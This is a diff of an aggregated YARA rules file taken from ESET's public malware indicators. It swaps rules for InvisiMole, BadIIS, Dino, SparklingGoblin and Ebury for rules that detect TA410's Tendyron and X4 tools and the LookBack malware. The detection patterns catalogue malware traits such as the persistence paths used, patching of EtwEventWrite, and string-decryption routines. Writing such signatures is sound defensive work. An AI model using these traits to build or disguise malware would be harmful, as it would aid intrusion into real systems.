+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L34-L40"
+		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
+		logic_hash = "71f492eaa80bee5e8cc5bec67b2a7fd6f5f71ee2594d9f531043747533c80443"
+		score = 75
+		quality = 80
+		tags = ""
+
+	condition:
+		not for any i in ( 0 .. pe.number_of_signatures - 1 ) : ( pe.signatures [ i ] . issuer contains "Microsoft Corporation" )
+}
 private rule ESET_Potaosecondstage_PRIVATE
 {
 	meta:
@@ -70626,33 +70688,6 @@ private rule ESET_Is_Elf_PRIVATE
 	condition:
 		$header at 0
 }
-private rule ESET_Invisimole_Blob_PRIVATE
-{
-	meta:
-		description = "Detects InvisiMole blobs by magic values"
-		author = "ESET Research"
-		id = "6a179d91-50f1-5400-b141-0f162efd2431"
-		date = "2021-05-17"
-		modified = "2021-05-17"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/invisimole/invisimole.yar#L34-L52"
-		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "8bddaf874da58fbe6362498f8979b511f39531fe2b98d4be8c099bdafb6d0067"
-		score = 75
-		quality = 80
-		tags = ""
-		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$magic_old_32 = {F9 FF D0 DE}
-		$magic_old_64 = {64 FF D0 DE}
-		$magic_new_32 = {86 DA 11 CE}
-		$magic_new_64 = {64 DA 11 CE}
-
-	condition:
-		($magic_old_32 at 0 ) or ( $magic_old_64 at 0 ) or ( $magic_new_32 at 0 ) or ( $magic_new_64 at 0 )
-}
 private rule ESET_Prikormkaearlyversion_PRIVATE
 {
 	meta:
@@ -70771,3286 +70806,3198 @@ private rule ESET_Prikormkadropper_PRIVATE
 	condition:
 		($mz at 0 ) and ( ( any of ( $bin* ) ) or ( 3 of ( $kd* ) ) or ( all of ( $inj* ) ) )
 }
-
-private rule ESET_IIS_Native_Module_PRIVATE : FILE
+rule ESET_Apt_Windows_TA410_Tendyron_Dropper
 {
 	meta:
-		description = "Signature to match an IIS native module (clean or malicious)"
+		description = "TA410 Tendyron Dropper"
 		author = "ESET Research"
-		id = "e3bacdc8-fde1-5e83-ac94-79fc345e888d"
-		date = "2021-08-04"
-		modified = "2021-08-04"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/badiis/badiis.yar#L34-L92"
-		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "5a388dc3253df606e2648d1f9c018e6dde373bbddce66dba69b7aecdd95bac18"
-		score = 75
-		quality = 55
-		tags = "FILE"
-		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$e1 = "This module subscribed to event"
-		$e2 = "CHttpModule::OnBeginRequest"
-		$e3 = "CHttpModule::OnPostBeginRequest"
-		$e4 = "CHttpModule::OnAuthenticateRequest"
-		$e5 = "CHttpModule::OnPostAuthenticateRequest"
-		$e6 = "CHttpModule::OnAuthorizeRequest"
-		$e7 = "CHttpModule::OnPostAuthorizeRequest"
-		$e8 = "CHttpModule::OnResolveRequestCache"
-		$e9 = "CHttpModule::OnPostResolveRequestCache"
-		$e10 = "CHttpModule::OnMapRequestHandler"
-		$e11 = "CHttpModule::OnPostMapRequestHandler"
-		$e12 = "CHttpModule::OnAcquireRequestState"
-		$e13 = "CHttpModule::OnPostAcquireRequestState"
-		$e14 = "CHttpModule::OnPreExecuteRequestHandler"
-		$e15 = "CHttpModule::OnPostPreExecuteRequestHandler"
-		$e16 = "CHttpModule::OnExecuteRequestHandler"
-		$e17 = "CHttpModule::OnPostExecuteRequestHandler"
-		$e18 = "CHttpModule::OnReleaseRequestState"
-		$e19 = "CHttpModule::OnPostReleaseRequestState"
-		$e20 = "CHttpModule::OnUpdateRequestCache"
-		$e21 = "CHttpModule::OnPostUpdateRequestCache"
-		$e22 = "CHttpModule::OnLogRequest"
-		$e23 = "CHttpModule::OnPostLogRequest"
-		$e24 = "CHttpModule::OnEndRequest"
-		$e25 = "CHttpModule::OnPostEndRequest"
-		$e26 = "CHttpModule::OnSendResponse"
-		$e27 = "CHttpModule::OnMapPath"
-		$e28 = "CHttpModule::OnReadEntity"
-		$e29 = "CHttpModule::OnCustomRequestNotification"
-		$e30 = "CHttpModule::OnAsyncCompletion"
-		$e31 = "CGlobalModule::OnGlobalStopListening"
-		$e32 = "CGlobalModule::OnGlobalCacheCleanup"
-		$e33 = "CGlobalModule::OnGlobalCacheOperation"
-		$e34 = "CGlobalModule::OnGlobalHealthCheck"
-		$e35 = "CGlobalModule::OnGlobalConfigurationChange"
-		$e36 = "CGlobalModule::OnGlobalFileChange"
-		$e37 = "CGlobalModule::OnGlobalApplicationStart"
-		$e38 = "CGlobalModule::OnGlobalApplicationResolveModules"
-		$e39 = "CGlobalModule::OnGlobalApplicationStop"
-		$e40 = "CGlobalModule::OnGlobalRSCAQuery"
-		$e41 = "CGlobalModule::OnGlobalTraceEvent"
-		$e42 = "CGlobalModule::OnGlobalCustomNotification"
-		$e43 = "CGlobalModule::OnGlobalThreadCleanup"
-		$e44 = "CGlobalModule::OnGlobalApplicationPreload"
-
-	condition:
-		uint16( 0 ) == 0x5A4D and pe.exports ( "RegisterModule" ) and any of ( $e* )
-}
-
-private rule ESET_Not_Ms_PRIVATE
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "7edb96a1-a63a-580e-ac26-66fa14ae97d1"
-		date = "2018-08-22"
-		modified = "2018-09-05"
-		reference = "https://github.com/eset/malware-ioc"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L34-L40"
-		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "71f492eaa80bee5e8cc5bec67b2a7fd6f5f71ee2594d9f531043747533c80443"
-		score = 75
-		quality = 80
-		tags = ""
-
-	condition:
-		not for any i in ( 0 .. pe.number_of_signatures - 1 ) : ( pe.signatures [ i ] . issuer contains "Microsoft Corporation" )
-}
-rule ESET_Dino
-{
-	meta:
-		description = "No description has been set in the source file - ESET"
-		author = "ESET TI"
-		id = "77d0a039-f60c-59ea-bad6-5b4b630007bb"
-		date = "2015-07-14"
-		modified = "2015-08-17"
+		id = "8d1e16d9-b5c2-5427-a0b4-7dd00a9df5ec"
+		date = "2020-12-09"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/animalfarm/animalfarm.yar#L73-L96"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L34-L53"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "898e527eb8b05050135dee7cbe974100710a1a3a6a5cb8eb03563ee1c0aca01f"
+		logic_hash = "45f7300a4b85624ad3fda5c73a24f53f53cb7990def4d84e04dcd8e5747f4f2e"
 		score = 75
 		quality = 80
 		tags = ""
-		Author = "Joan Calvet"
-		Description = "Dino backdoor"
-		Contact = "github@eset.com"
-		License = "BSD 2-Clause"
+		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$ = "PsmIsANiceM0du1eWith0SugarInsideA"
-		$ = "destroyPSM"
-		$ = "FM_PENDING_DOWN_%X"
-		$ = "%s was canceled after %d try (reached MaxTry parameter)"
-		$ = "you forgot value name"
-		$ = "wakeup successfully scheduled in %d minutes"
-		$ = "BD started at %s"
-		$ = "decyphering failed on bd"
+		$s1 = "Global\\{F473B3BE-08EE-4710-A727-9E248F804F4A}" wide
+		$s2 = "Global\\8D32CCB321B2" wide
+		$s3 = "Global\\E4FE94F75490" wide
+		$s4 = "Program Files (x86)\\Internet Explorer\\iexplore.exe" wide
+		$s5 = "\\RPC Control\\OLE" wide
+		$s6 = "ALPC Port" wide
 
 	condition:
-		any of them
+		int16 ( 0 ) == 0x5A4D and 4 of them
 }
-
-rule ESET_Sparklinggoblin_Chacha20Loader_Richheader
+rule ESET_Apt_Windows_TA410_Tendyron_Installer
 {
 	meta:
-		description = "Rule matching ChaCha20 loaders rich header"
+		description = "TA410 Tendyron Installer"
 		author = "ESET Research"
-		id = "e1dac369-f25e-5cb3-aafa-b0c45f05b295"
-		date = "2021-03-30"
-		modified = "2021-08-26"
+		id = "95ccad1c-99fb-5d38-aec0-650db3e06b35"
+		date = "2020-12-09"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L33-L57"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L55-L73"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "09ffe37a54bc4ebebd8d56098e4c76232f35d821"
-		hash = "29b147b76bb0d9e09f7297487cb972e6a2905586"
-		hash = "33f2c3de2457b758fc5824a2b253ad7c7c2e9e37"
-		hash = "45bef297ce78521eac6ee39e7603e18360e67c5a"
-		hash = "4cec7cdc78d95c70555a153963064f216dae8799"
-		hash = "4d4c1a062a0390b20732ba4d65317827f2339b80"
-		hash = "4f6949a4906b834e83ff951e135e0850fe49d5e4"
-		logic_hash = "a5c9595036dec0e0aef0a030c590189752217d15d3f53bf3dc537f5b43fae63e"
+		logic_hash = "9c3afb924747614f27c31cf2c3d98f4932a9d11597a3ac94263bf93be02801da"
 		score = 75
 		quality = 80
 		tags = ""
 		license = "BSD 2-Clause"
+		version = "1"
+
+	strings:
+		$s1 = "Tendyron" wide
+		$s2 = "OnKeyToken_KEB.dll" wide
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" wide
+		$s4 = "Global\\8D32CCB321B2"
+		$s5 = "\\RTFExploit\\"
 
 	condition:
-		pe.rich_signature.length>= 104 and pe.rich_signature.length <= 112 and pe.rich_signature.toolid ( 241 , 40116 ) >= 5 and pe.rich_signature.toolid ( 241 , 40116 ) <= 10 and pe.rich_signature.toolid ( 147 , 30729 ) == 11 and pe.rich_signature.toolid ( 264 , 24215 ) >= 15 and pe.rich_signature.toolid ( 264 , 24215 ) <= 16
+		int16 ( 0 ) == 0x5A4D and 3 of them
 }
-rule ESET_Sparklinggoblin_Chacha20 : FILE
+rule ESET_Apt_Windows_TA410_Tendyron_Downloader
 {
 	meta:
-		description = "SparklingGoblin ChaCha20 implementations"
+		description = "TA410 Tendyron Downloader"
 		author = "ESET Research"
-		id = "c0caceca-f685-5786-82f6-3ab7435f8061"
-		date = "2021-05-20"
-		modified = "2021-08-26"
+		id = "afd8a2a7-8d58-5a96-b9e0-6f8b859e83c5"
+		date = "2020-12-09"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L59-L368"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L75-L107"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
-		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
-		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
-		hash = "4668302969fe122874fb2447a80378dcb671c86b"
-		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
-		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
-		hash = "91b32e030a1f286e7d502ca17e107d4bfbd7394a"
-		logic_hash = "b742bc22e0ebbce40607cb109b4d6fb03a40c1fb223c8092d93346dd3dd22789"
+		logic_hash = "16030a78ae9af8783f5913644294ceff861c8264ead8ca99435032be6d7949ef"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
 		$chunk_1 = {
-            8B 4D ??
-            56
-            8B 75 ??
-            57
-            8B 7D ??
-            8B 04 BB
-            01 04 93
-            8B 04 B3
-            33 04 93
-            C1 C0 10
-            89 04 B3
-            01 04 8B
-            8B 04 BB
-            33 04 8B
-            C1 C0 0C
-            89 04 BB
-            01 04 93
-            8B 04 B3
-            33 04 93
-            C1 C0 08
-            89 04 B3
-            01 04 8B
-            8B 04 BB
-            33 04 8B
-            C1 C0 07
-            89 04 BB
-        }
-		$chunk_2 = {
-            03 4D ??
-            44 03 C0
-            03 55 ??
-            33 F1
-            45 33 D8
-            C1 C6 10
-            44 33 F2
-            41 C1 C3 10
-            41 03 FB
-            41 C1 C6 10
-            45 03 E6
-            41 03 DA
-            44 33 CB
-            44 03 EE
-            41 C1 C1 10
-            8B C7
-            33 45 ??
-            45 03 F9
-            C1 C0 0C
-            44 03 C0
-            45 33 D8
-            44 89 45 ??
-            41 C1 C3 08
-            41 03 FB
-            44 8B C7
-            44 33 C0
-            41 8B C5
-            33 45 ??
-            C1 C0 0C
-            03 C8
-            41 C1 C0 07
-            33 F1
-            89 4D ??
-            C1 C6 08
-            44 03 EE
-            41 8B CD
-            33 C8
-            41 8B C4
-            33 45 ??
-            C1 C0 0C
-            03 D0
-            C1 C1 07
-            44 33 F2
-            89 55 ??
-            41 C1 C6 08
-            45 03 E6
-            41 8B D4
-            33 D0
-            41 8B C7
-            41 33 C2
-            C1 C2 07
-            C1 C0 0C
-            03 D8
-            44 33 CB
-            41 C1 C1 08
-            45 03 F9
-            45 8B D7
-            44 33 D0
-            8B 45 ??
-            03 C1
-            41 C1 C2 07
-            44 33 C8
-            89 45 ??
-            41 C1 C1 10
-            45 03 E1
-            41 8B C4
-            33 C1
-            8B 4D ??
-            C1 C0 0C
-            03 C8
-            44 33 C9
-            89 4D ??
-            89 4D ??
-            41 C1 C1 08
-            45 03 E1
-            41 8B CC
-            33 C8
-            8B 45 ??
-            C1 C1 07
-            89 4D ??
-            89 4D ??
-            03 C2
-            41 03 D8
-            89 45 ??
-            41 33 C3
-            C1 C0 10
-            44 03 F8
-            41 8B CF
-            33 CA
-            8B 55 ??
-        }
-		$chunk_3 = {
-            C7 45 ?? 65 78 70 61
-            4C 8D 45 ??
-            C7 45 ?? 6E 64 20 33
-            4D 8B F9
-            C7 45 ?? 32 2D 62 79
-            4C 2B C1
-            C7 45 ?? 74 65 20 6B
-        }
-		$chunk_4 = {
-            0F B6 02
-            0F B6 4A ??
-            C1 E1 08
-            0B C8
-            0F B6 42 ??
-            C1 E1 08
-            0B C8
-            0F B6 42 ??
-            C1 E1 08
-            0B C8
-            41 89 0C 10
-            48 8D 52 ??
-            49 83 E9 01
-        }
-		$chunk_5 = {
-            03 4D ??
-            44 03 C0
-            03 55 ??
-            33 F1
-            41 33 F8
-            C1 C6 10
-            44 33 F2
-            C1 C7 10
-            44 03 DF
-            41 C1 C6 10
-            45 03 E6
-            44 03 CB
-            45 33 D1
-            44 03 EE
-            41 C1 C2 10
-            41 8B C3
-            33 45 ??
-            45 03 FA
-            C1 C0 0C
-            44 03 C0
-            41 33 F8
-            44 89 45 ??
-            C1 C7 08
-            44 03 DF
-            45 8B C3
-            44 33 C0
-            41 8B C5
-            33 45 ??
-            C1 C0 0C
-            03 C8
-            41 C1 C0 07
-            33 F1
-            89 4D ??
-            C1 C6 08
-            44 03 EE
-            41 8B CD
-            33 C8
-            41 8B C4
-            33 45 ??
-            C1 C0 0C
-            03 D0
-            C1 C1 07
-            44 33 F2
-            89 55 ??
-            41 C1 C6 08
-            45 03 E6
-            41 8B D4
-            33 D0
-            41 8B C7
-            33 C3
-            C1 C2 07
-            C1 C0 0C
-            44 03 C8
-            45 33 D1
-            41 C1 C2 08
-            45 03 FA
-            41 8B DF
-            33 D8
-            8B 45 ??
-            03 C1
-            C1 C3 07
-            44 33 D0
-            89 45 ??
-            41 C1 C2 10
-            45 03 E2
-            41 8B C4
-            33 C1
-            8B 4D ??
-            C1 C0 0C
-            03 C8
-            44 33 D1
-            89 4D ??
-            89 4D ??
-            41 C1 C2 08
-            45 03 E2
-            41 8B CC
-            33 C8
-            8B 45 ??
-            C1 C1 07
-            89 4D ??
-            89 4D ??
-            03 C2
-            45 03 C8
-            89 45 ??
-            33 C7
-            C1 C0 10
-            44 03 F8
-            41 8B CF
-            33 CA
-            8B 55 ??
-            C1 C1 0C
-            03 D1
-            8B FA
-            89 55 ??
-            33 F8
-            89 55 ??
-            8B 55 ??
-            03 D3
-            C1 C7 08
-            44 03 FF
-            41 8B C7
-            33 C1
-            C1 C0 07
-            89 45 ??
-            89 45 ??
-            8B C2
-            33 C6
-            C1 C0 10
-            44 03 D8
-            41 33 DB
-            C1 C3 0C
-            03 D3
-            8B F2
-            89 55 ??
-            33 F0
-            41 8B C1
-            41 33 C6
-            C1 C6 08
-            C1 C0 10
-            44 03 DE
-            44 03 E8
-            41 33 DB
-            41 8B CD
-            C1 C3 07
-            41 33 C8
-            44 8B 45 ??
-            C1 C1 0C
-            44 03 C9
-            45 8B F1
-            44 33 F0
-            41 C1 C6 08
-            45 03 EE
-            41 8B C5
-            33 C1
-            8B 4D ??
-            C1 C0 07
+            8A 10
+            80 F2 5C
+            80 C2 5C
+            88 10
+            40
+            83 E9 01
+            75 ??
         }
+		$s1 = "startModule" fullword
 
 	condition:
-		any of them and filesize < 450KB
+		int16 ( 0 ) == 0x5A4D and all of them
 }
-rule ESET_Sparklinggoblin_Etweventwrite
+rule ESET_Apt_Windows_TA410_X4_Strings
 {
 	meta:
-		description = "SparklingGoblin EtwEventWrite patching"
+		description = "Matches various strings found in TA410 X4"
 		author = "ESET Research"
-		id = "27b36ee1-a98c-5174-a156-8e0b0d0a58cd"
-		date = "2021-05-20"
-		modified = "2021-08-26"
+		id = "e6af4516-8b79-5182-8571-7dd530632ddc"
+		date = "2020-10-09"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L370-L463"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L109-L125"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
-		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
-		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
-		hash = "4668302969fe122874fb2447a80378dcb671c86b"
-		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
-		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
-		logic_hash = "45615dcc5302392c18052818071623a9d1a1008c460bdb24a4acfb4300356c6b"
+		logic_hash = "d4b2321a6d0eb0ca8d7c47596af2a45c22b3aef15d1832d64d6588a62cab312a"
 		score = 75
-		quality = 80
+		quality = 74
 		tags = ""
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$chunk_1 = {
-            48 8D 0D ?? ?? ?? ??
-            C7 44 24 ?? 48 31 C0 C3
-            FF 15 ?? ?? ?? ??
-            48 8B C8
-            48 8D 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ??
-            83 64 24 ?? 00
-            4C 8D 4C 24 ??
-            BF 04 00 00 00
-            48 8B C8
-            8B D7
-            48 8B D8
-            44 8D 47 ??
-            FF 15 ?? ?? ?? ??
-            44 8B C7
-            48 8D 54 24 ??
-            48 8B CB
-            E8 ?? ?? ?? ??
-            44 8B 44 24 ??
-            4C 8D 4C 24 ??
-            8B D7
-            48 8B CB
-            FF 15 ?? ?? ?? ??
-            48 8B 05 ?? ?? ?? ??
-        }
-		$chunk_2 = {
-            55
-            8B EC
-            51
-            51
-            57
-            68 08 1A 41 00
-            66 C7 45 ?? C2 14
-            C6 45 ?? 00
-            FF 15 ?? ?? ?? ??
-            68 10 1A 41 00
-            50
-            FF 15 ?? ?? ?? ??
-            83 65 ?? 00
-            8B F8
-            8D 45 ??
-            50
-            6A 40
-            6A 03
-            57
-            FF 15 ?? ?? ?? ??
-            6A 03
-            8D 45 ??
-            50
-            57
-            E8 ?? ?? ?? ??
-            83 C4 0C
-            8D 45 ??
-            50
-            FF 75 ??
-            6A 03
-            57
-            FF 15 ?? ?? ?? ??
-        }
-		$chunk_3 = {
-            48 8D 0D ?? ?? ?? ??
-            C7 44 24 ?? 48 31 C0 C3
-            FF 15 ?? ?? ?? ??
-            48 8B C8
-            48 8D 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ??
-        }
+		$s1 = "[X]InLoadSC" ascii wide nocase
+		$s3 = "MachineKeys\\Log\\rsa.txt" ascii wide nocase
+		$s4 = "MachineKeys\\Log\\output.log" ascii wide nocase
 
 	condition:
 		any of them
 }
-rule ESET_Sparklinggoblin_Mutex
+rule ESET_Apt_Windows_TA410_X4_Hash_Values : FILE
 {
 	meta:
-		description = "SparklingGoblin ChaCha20 loaders mutexes"
+		description = "Matches X4 hash function found in TA410 X4"
 		author = "ESET Research"
-		id = "e33d2bc1-29d6-5117-8e0f-31f8bced0979"
-		date = "2021-05-20"
-		modified = "2021-08-26"
+		id = "859bb977-82d0-5314-b1a8-fb3bb06a1b28"
+		date = "2020-10-09"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/sparklinggoblin/SparklingGoblin.yar#L465-L489"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L127-L149"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "2edbea43f5c40c867e5b6bbd93cc972525df598b"
-		hash = "b6d245d3d49b06645c0578804064ce0c072cbe0f"
-		hash = "8be6d5f040d0085c62b1459afc627707b0de89cf"
-		hash = "4668302969fe122874fb2447a80378dcb671c86b"
-		hash = "9bdecb08e16a23d271d0a3e836d9e7f83d7e2c3b"
-		hash = "9ce7650f2c08c391a35d69956e171932d116b8bd"
-		logic_hash = "00fbd514c8e2d6dea3b0f175e857a613e158b64caf1f970e814d62f1ebe9d35c"
+		logic_hash = "bcf3891ff888ca99af9aa0e239b29241ae819022607fb829c5731267add308ea"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
+		version = "1"
 
 	strings:
-		$mutex_1 = "kREwdFrOlvASgP4zWZyV89m6T2K0bIno"
-		$mutex_2 = "v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw"
+		$s1 = {D1 10 76 C2 B6 03}
+		$s2 = {71 3E A8 0D}
+		$s3 = {DC 78 94 0E}
+		$s4 = {40 0D E7 D6 06}
+		$s5 = {83 BB FD E8 06}
+		$s6 = {92 9D 9B FF EC 03}
+		$s7 = {DD 0E FC FA F5 03}
+		$s8 = {15 60 1E FB F5 03}
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and 4 of them
 }
-
-rule ESET_Libkeyutils_With_Ctor
+rule ESET_Apt_Windows_TA410_X4_Hash_Fct : FILE
 {
 	meta:
-		description = "This rule detects if a libkeyutils.so shared library has a potentially malicious function to be called when loaded, either via a glibc constructor (DT_INIT + .ctors) or an initializer function in DT_INIT_ARRAY."
-		author = "ESET, spol. s r.o."
-		id = "7b466bf7-f895-569d-99b0-eca95a6ebc83"
-		date = "2024-02-01"
-		modified = "2024-04-29"
+		description = "Matches X4 hash function found in TA410 X4"
+		author = "ESET Research"
+		id = "5ca435a4-7c6e-594d-8c4d-d577735884e6"
+		date = "2020-10-09"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/windigo/ebury.yar#L3-L54"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L151-L187"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
-		logic_hash = "c6172aebc67a05fb044b0450aafcc71c7d1fd2831985587d1a9ad53f59e14214"
-		score = 40
+		logic_hash = "3b2d44cb7685a99e9aeb08f886f6876d43ee99d1e52e40705c3fa97ce3bfa9a0"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = 2
+		version = "1"
 
 	strings:
-		$libname = "libkeyutils.so.1"
+		$chunk_1 = {
+            0F B6 01
+            84 C0
+            74 ??
+            48 69 D2 83 00 00 00
+            48 0F BE C0
+            48 03 D0
+            48 FF C1
+            E9 ?? ?? ?? ??
+        }
 
 	condition:
-		for any ptr_size in ( 4 , 8 ) : ( ( ( ptr_size == 4 and elf.machine == elf.EM_386 ) or ( ptr_size == 8 and elf.machine == elf.EM_X86_64 ) ) and for any d in elf.dynamic : ( d.type == elf.DT_SONAME and ( for any s in elf.sections : ( s.name == ".dynstr" and $libname at ( s.offset + d.val ) ) or for any s in elf.dynamic : ( s.type == elf.DT_STRTAB and $libname at ( s.val + d.val ) ) ) ) and ( for any s in elf.sections : ( s.name == ".ctors" and s.size > 2 * ptr_size ) or for any d in elf.dynamic : ( d.type == elf.DT_INIT_ARRAYSZ and d.val > ptr_size ) ) )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule ESET_Ebury_V1_7_Crypto
+rule ESET_Apt_Windows_TA410_Lookback_Decryption : FILE
 {
 	meta:
-		description = "This rule detects the strings decryption routine in Ebury v1.7 and v1.8"
-		author = "ESET, spol. s r.o."
-		id = "93dadf5f-b572-5217-8c82-4957c6d24955"
-		date = "2023-08-01"
-		modified = "2024-04-29"
+		description = "Matches encryption/decryption function used by LookBack."
+		author = "ESET Research"
+		id = "91947c6b-f357-5cf8-8522-4dcd517d01cb"
+		date = "2021-10-12"
+		modified = "2022-04-27"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/windigo/ebury.yar#L56-L97"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L189-L254"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
-		logic_hash = "41908951069a472d7528f2f228f3681f008d16a0436e341d339909efc4933e66"
+		logic_hash = "016dca6be654fcd193acc481e6a998efbb77e7ebd09b26614422be1136dd02c0"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		license = "BSD 2-Clause"
-		version = 1
+		version = "1"
 
 	strings:
-		$64 = {
-            48 69 ( 9C 24 ?? ?? ?? ?? | 5C 24 ?? | D2) 6D 4E C6 41 //  imul    rbx, [rsp+_buf], 41C64E6Dh
-            8B (0C 16 | 34 07)                      //  mov     ecx, [rsi+rdx]
-            48 81 C? 39 30 00 00                    //  add     rbx, 12345
-            ( 31 D? |                               //  xor     ecx, ebx
-              31 D? 48 89 9C 24 ?? ?? ?? ?? |       //  mov     [rsp+_buf], rbx
-              31 D? 48 89 5C 24 ?? )                //  ^ optional
-            89 (0C 10 | 34 01)                      //  mov     [rax+rdx], ecx
-            48 83 C? 04                             //  add     rdx, 4
-            48 (81 FA | 3D ) ?? ?? ?? ??            //  cmp     rdx, _size
-            75 D?                                   //  jnz     short _begin
+		$initialize = {
+            8B C6           //mov eax, esi
+            99              //cdq
+            83 E2 03        //and edx, 3
+            03 C2           //add eax, edx
+            C1 F8 02        //sar eax, 2
+            8A C8           //mov cl, al
+            02 C0           //add al, al
+            02 C8           //add cl, al
+            88 4C 34 10         //mov byte ptr [esp + esi + 0x10], cl
+            46              //inc esi
+            81 FE 00 01 00 00       //cmp esi, 0x100
+            72 ??
         }
-		$32 = {
-            69 C9 6D 4E C6 41      // imul    ecx, 41C64E6Dh
-            8B B4 1A ?? ?? ?? ??   // mov     esi, [edx+ebx+_data]
-            81 C1 39 30 00 00      // add     ecx, 12345
-            31 CE                  // xor     esi, ecx
-            89 34 10               // mov     [eax+edx], esi
-            83 C2 04               // add     edx, 4
-            81 FA ?? ?? ?? ??      // cmp     edx, _size
-            75 DD                  // jnz     short loc_69A5
+		$generate = {
+            8A 94 1C 10 01 ?? ??    //mov dl, byte ptr [esp + ebx + 0x110]
+            8D 8C 24 10 01 ?? ??    //lea ecx, [esp + 0x110]
+            0F B6 C3        //movzx eax, bl
+            0F B6 44 04 10      //movzx eax, byte ptr [esp + eax + 0x10]
+            32 C2           //xor al, dl
